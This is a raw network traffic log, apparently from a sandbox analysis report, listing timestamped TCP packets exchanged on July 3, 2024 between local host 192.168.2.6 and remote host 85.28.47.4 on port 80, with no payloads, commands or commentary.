                                                                Jul 3, 2024 08:38:18.317003965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317014933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317025900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317027092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.317037106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317049026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317058086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317064047 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.317068100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317079067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317085981 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.317089081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317101955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317111015 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.317111969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317122936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317126989 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.317132950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317143917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317153931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317156076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.317184925 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.317922115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317934036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317945957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317955971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317965984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317974091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.317976952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317986965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.317997932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318002939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318007946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318018913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318030119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318034887 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318039894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318052053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318053961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318062067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318073034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318073988 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318084002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318087101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318094015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318116903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318141937 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318864107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318876028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318886995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318897009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318907976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318917036 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318918943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318929911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318936110 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318941116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318950891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318960905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318965912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318968058 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318977118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318981886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.318986893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.318999052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.319009066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.319015980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.319020033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.319031954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.319041967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.319062948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400285006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400302887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400322914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400335073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400346041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400358915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400374889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400407076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400440931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400477886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400513887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400526047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400547028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400563955 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400651932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400669098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400681019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400688887 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400691986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400703907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400707960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400728941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400754929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400877953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400888920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.400917053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.400934935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401005030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401015997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401026964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401037931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401050091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401051044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401063919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401098967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401268005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401278973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401288986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401299953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401309967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401310921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401320934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401329994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401333094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401344061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401350021 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401372910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401685953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401700974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401727915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401751041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401828051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401840925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401851892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401864052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401875019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.401875973 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401923895 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.401937008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.402175903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402187109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402200937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402211905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402221918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402225971 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.402225971 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.402232885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402245045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402257919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402265072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.402271986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402283907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402287006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.402295113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402301073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.402304888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402316093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402328014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.402332067 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.402357101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.402365923 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.403048038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403059959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403070927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403081894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403093100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403095007 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.403104067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403114080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403120995 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.403124094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403135061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403140068 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.403145075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403156042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403160095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.403166056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403173923 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.403177023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403187037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403198004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403203011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.403208971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.403228045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.403244972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.404021978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404033899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404043913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404055119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404062986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404069901 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.404073954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404088974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.404088974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404100895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404110909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404114962 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.404122114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404131889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404131889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.404143095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404153109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.404153109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404165030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404171944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.404175997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404186010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404195070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404201031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.404207945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404228926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.404247046 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.404963017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404973984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404984951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.404995918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405005932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405006886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405016899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405026913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405030012 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405038118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405049086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405059099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405060053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405070066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405078888 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405081034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405091047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405097961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405102015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405112982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405113935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405122995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405138016 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405150890 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405194998 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405869007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405879974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405889988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405900955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405906916 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405910969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405920982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405926943 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405931950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405941963 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405956984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405957937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405970097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405981064 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.405982018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.405993938 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.406023026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.487454891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487497091 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487513065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487524033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487535000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487545967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487546921 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.487586021 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.487617016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487620115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.487653017 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.487684011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487694979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487706900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487719059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487720966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.487737894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.487771034 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.487901926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487943888 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.487988949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.487999916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488009930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488019943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488042116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488056898 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488084078 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488181114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488219976 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488301039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488320112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488331079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488341093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488348961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488352060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488358974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488363981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488379002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488384962 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488400936 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488456964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488639116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488678932 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488832951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488845110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488853931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488864899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488874912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488883972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488886118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488897085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488914013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488919020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488924980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488935947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488941908 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488946915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.488964081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.488982916 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.489480972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489495993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489506960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489517927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489528894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489530087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.489538908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489550114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489552021 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.489559889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489569902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489581108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489586115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.489590883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489600897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489608049 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.489612103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489628077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.489634037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.489649057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.489675999 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490178108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490189075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490205050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490215063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490226030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490228891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490236044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490247011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490261078 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490279913 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490653038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490664005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490674019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490684986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490695000 CEST804971085.28.47.4192.168.2.6
